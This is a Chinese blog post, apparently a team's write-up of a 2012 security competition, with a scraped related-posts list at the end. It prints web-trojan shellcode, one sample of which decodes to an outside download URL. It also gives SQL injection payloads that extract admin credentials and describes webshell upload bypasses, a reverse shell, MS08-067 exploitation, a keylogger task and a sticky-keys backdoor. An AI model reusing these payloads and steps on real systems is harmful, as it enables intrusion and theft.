时间2012.12.02 9:00-14:00
1>必须用简要文字描述操作的过程，以及保存操作截图。
2>竞赛过程中参赛者不得通过任何途径连接互联网，违者取消比赛资格！
操作题包含了web安全、主机安全、恶意程序、数据库安全和安全加固等方面的攻防题目，总15道大题，共100分。
留此简单记录竞赛过程
题目简析：
1&2&3 网马解密
0×01 初级网马
var shellcode = unescape(“%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2e55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2f3a%u772f%u7777%u612e%u6870%u6361%u2e6b%u6f63%u2f6d%u7878%u6f6f%u742f%u6f62%u2e79%u7865%u0065%u0000″)
解密得到网马地址

0×02 中级网马
var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\testSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
ShellCode="";
ShellCode=ShellCode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI";
ShellCode=ShellCode+"xkR0qJPJP3YY0fNYwLEQk0p47zpf"+"KRKJJKVe9xJKYoIoYolOoCQv";
ShellCode=ShellCode+"3VsVwLuRKwRva"+"vbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB";
ShellCode=ShellCode+"sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO";
ShellCode=ShellCode+"NuKpTRr"+"NWOVYM5m"+"qqrwSMTn"+"oeoty08JM"+"nKJMgPw2p"+"ey5MgMWQuMw";
ShellCode=ShellCode+"runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX";
ShellCode=ShellCode+"HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK";
ShellCode=ShellCode+"e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI";
ShellCode=ShellCode+"5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ";
ShellCode=ShellCode+"OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL";
ShellCode=ShellCode+"gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5";
ShellCode=ShellCode+"PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN";
ShellCode=ShellCode+"eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw";
ShellCode=ShellCode+"2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW";
ShellCode=ShellCode+"qvRHptd4RPFZVOdoRWQgrWTnRL0l3FSQ2LQeautnasPntorN0bQhFNPeT8Quopwp";
为alpha2的TYIIIIIIIIIIIIIIII加密，工具解密得到网马地址
推荐MDecoder&Freshow

0×03 高级网马
没解出来，不贴了，期待官方解答
4&5&6&7&8 Linux-PHP-Mysql-注入到上传&提权&留root后门账户
注入
http://xxoo/zcncms/?c=articles&a=show&id=9 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(username,0x5c,userpassword),15,16,17 from information_schema.COLUMNS where TABLE_NAME=0x7A636E5F7573657273 limit 2,1
得到如下回显

账户密码admin bdtboy007位置比较yd
后台：http://xxoo/zcncms/admin_login/
改包上传得到shell
Linux，反弹 www.2cto.com

2.6.18，提权脚本上了几个，没成功，时间紧张，索性没继续。
0×09

http://xxoo/test.asp存在SQL注入漏洞，通过页面中提示，查询出数据库中一个MD5加密后的32位KEY值。

mssql字符型注入
id=1’having ‘1’=’1
Group by继续
得到的信息thekey.id thekey.here thekey.isnot
没下文了
0×10
http://xxoo:81/upload.asp 页面存在上传漏洞，请上传一个可以正常访问的webshell
抓包修改目录uploa1.asp

http://192.168.2.27:81/uploa1.asp/JPG/GFtest/2-96365-ok1.jpg

0×11
下载辅助源码code.rar
http://xxoo:82/ 站点上存在SQL注入漏洞。查询到管理账户名和密码。上传一个可以正常访问webshell。
Asp注入，过滤and7种，AnD可以突破，当时没来及看题目，无细节。
0×12
下载辅助源码code.rar （其中有一个漏洞利用程序ec.html）
获取站点http://xxoo:83/ecshop/
后台管理账户/密码
上传一个可以正常访问webshell
在ec.heml 中构造注入语句：

union select 1 from
(select count(*),concat(floor(rand(0)*2),(select concat(0x3a,user_name,0x3a,email) from users limit 0,1))a from information_schema.tables group by a)b#
得到如下信息
Id为1
admintest1
test@xian.com
Password：3e69d9e576ba7fb036d9c7c38abf79e0
队友说账号貌似无效，在挖get_password.php洞，有了一些信息，时间不够，没整完，也不贴了。
0×13
扫描远程服务器1，并对扫描结果中漏洞实施攻击，通过利用漏洞创建一个用户名为test(密码：test123)。以test用户远程登录服务器1。
Nessus扫了下，MS08-067，Metaspolit得shell，创建账户test/test123。

0×14
使用计算机语言编写一个名称为hackbluedon键盘记录器，记录用户对键盘的所有操作。
（远程服务器1已经安装好VC++开发环境，也可以使用自己电脑的开发环境）
要求：将编写好的工具代码复制到服务器1桌面上并运行起来，并且呈现记录生成的文本（把自动生成记录日志为xabd.log，存放路径为C:\目录下）（填写记录本队名称日志截图）
编一个KeyLogger

0×15 安全加固
以用户administrator（密码123456）登录上服务器1。
<1>关闭登录时显示上一次用户名。
<2>创建一个密码为test123的shift后门。
<3>修改远程登录端口为12345。
<4>修改ping时的TTL值为222。
<5>创建IP安全策略：禁止ping该服务器。
<6>通过修改本地策略禁止远程用户修改注册表。
要求截图，过程
1.修改本地安全策略
Don display last user name
设置为enable

也可设置注册表
HKLM\Software\Microsoft\WindowsT\ CurrentVersion\Winlogon\Dont-DisplayLastUserName”，把REG_SZ的键值改成1。
2.shift后门
要求密码test123，没外网，手头也没，只好用作自解压文件1.exe
密码为test123
自解压后执行cmd.exe
利用meterpreter上传到服务器，替换shift

3.修改登陆端口
修改注册表
HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WDS/RDPWD/TDS/TCP
HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WINSTATIONS/RDP-TCP/
修改PortNumber为12345

4.修改ttl为222
修改注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

5.创建ip策略，创建规则
可参考http://www.jb51.net/article/19479.htm
6.禁止远程修改注册表
在services.msc中启动Remote Registry
/*
结果不错，拿了一等奖
也有不少收获
蓝盾的大大搭环境也辛苦了
小生深有体会
存此记录
2012.12
*/

2012年蓝盾杯信息安全竞赛小记相关推荐

1. 蓝盾计算机学校,“蓝盾杯”计算机网络技术竞赛创新突破

   世赛引领,校企共筑 记广州白云工商技师学院21届科技节信息工程系"蓝盾杯"计算机网络技术竞赛创新突破 前沿引领,"N"个突破!在红红火火的红五月,青春活力充满了 ...

2. 2021年“绿盟杯”重庆市大学生信息安全竞赛—Light1ng战队Writeup

   2021年"绿盟杯"重庆市大学生信息安全竞赛-Light1ng战队Writeup 其余方向Writeup详见pdf:https://wws.lanzoui.com/iWk1ovo0 ...

3. 第一届“百度杯”信息安全攻防总决赛

   第一届"百度杯"信息安全攻防总决赛(3月15-3月26) 比赛通道: 第一届"百度杯"信息安全攻防总决赛比赛通道 百度杯已经陪伴大家度过了七个月, 共计23场比 ...

4. 2012“粤嵌杯”芯片应用电子设计比赛成功举办

   2012"粤嵌杯"芯片应用电子设计比赛成功举办 12月13日,2012"粤嵌杯"芯片应用电子设计比赛在华工汽车学院成功举办.本次大赛在广东电子爱好者协会的鼎力支 ...

5. 2012“粤嵌杯”大学生嵌入式与物联网设计大赛决赛

   2012"粤嵌杯"广东省大学生嵌入式与物联网设计大赛决赛将于10月20日在广东工业大学校区内隆重举行,届时7个月的比赛将在当天落下帷幕,揭晓决赛获奖得主. "粤嵌杯&qu ...

6. 中煤保险 公司举办“虎啸杯”保险知识竞赛活动

   为深入推进公司企业文化建设,进一步在公司营造良好的学习氛围,检验前一阶段学习效果,激发广大员工爱岗敬业的热情和创业激情,提高员工的专业水平和整体素质,2010年3月19日,公司隆重举行了中煤保险抓学习 ...

7. QZEZ第一届“饭吉圆”杯程序设计竞赛

   终于到了饭吉圆杯的开赛,这是EZ我参与的历史上第一场ACM赛制的题目然而没有罚时 不过题目很好,举办地也很成功,为法老点赞!!! 这次和翰爷,吴骏达 dalao,陈乐扬dalao组的队,因为我们有二个 ...

8. Entrust Datacard新一代再转印证卡打印机系列喜获蓝盾杯创新奖

   明尼阿波利斯 -- (美国商业资讯) -- 近日,安全证件和安全交易技术的领航企业Entrust Datacard公司宣布:EntrustDatacard最新一代再转印技术证卡打印机系列喜获由中国国际 ...

9. 2012年华为杯校园编程大赛决赛 类别：软件C/C++语言

   2012年华为杯校园编程大赛决赛 类别:软件C/C++语言 编程题(共1题,100分.请上机编写程序,按题目要求提交文件.测试用例不对考生公开,凡不满足提交要求导致不能运行或用例不通过,不予评分.) ...

最新文章

1. html图片滚动红点_HTML中更换或添加网站背景图片的代码怎么写？（示例）
2. 大势至电脑文件防泄密软件_有了数据防泄密软件，还会担心企业文件泄漏吗？...
3. Linux的cmake3的安装 cmake3编译安装成功了的 yum对于cmake3表示成功但实际没成功
4. 人人都是 DBA（III）SQL Server 调度器
5. POJ 2230 Watchcow 欧拉回路的DFS解法（模板题）
6. P7443-加边【博弈论】
7. php 数组移除指定健,php删除数组指定键的方法
8. python中添加路径_python中添加模块导入路径的方法
9. window下 php debug 的安装
10. 【博客管理】短期长期计划【置顶】
11. Pr 音频效果参考：特殊效果
12. 老王的JAVA基础课：第6课 JAVA基本数据类型
13. LG化学成为海水淡化领域膜领导品牌后，大举进军苦咸水反渗透膜市场
14. 执行Transact-SQL语句或批处理时发生异常
15. 计算机专业择偶标准,爱情句子：说来说去我的择偶标准也就一个字——你
16. 创客学院知识巩固-01C语言回顾
17. 嵌入式软件工程师必须了解的八大加密算法
18. C/C++实现数据结构严蔚敏版的一些注意事项（指南）
19. 取消参考文献自动编号_利用Word自动维护参考文献的编号和引用
20. HALCON联合C#检测表面缺陷——HALCON例程autobahn

热门文章

1. POJ2251-Dungeon Master
2. 深度置信网 DBNs
3. 解答：显示器能显示画面，但是一闪一闪是什么原因
4. mac无法挂载ntfs移动硬盘
5. python3小项目——爬取招聘信息(智联招聘)
6. 关闭睿频提升续航静音运行
7. LVOOP(二)、面向对象概念演示
8. Note2：使用socket套接字通信
9. 探索Android 9.0 Pie新特性变更
10. 安卓最新版本_安卓/苹果 | 两大平台最新版本，看片神器！